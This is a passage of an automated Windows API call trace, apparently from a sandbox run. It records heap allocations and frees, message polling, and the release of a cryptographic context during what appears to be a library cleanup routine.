[0126.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392688 | out: hHeap=0x1780000) returned 1 [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0126.062] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0126.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0126.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0126.064] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0126.064] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0126.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0126.064] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0126.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0126.065] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0126.065] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.065] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0126.065] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0126.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0126.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0126.067] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0126.067] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0126.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.068] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.068] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.069] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.071] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0126.071] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: 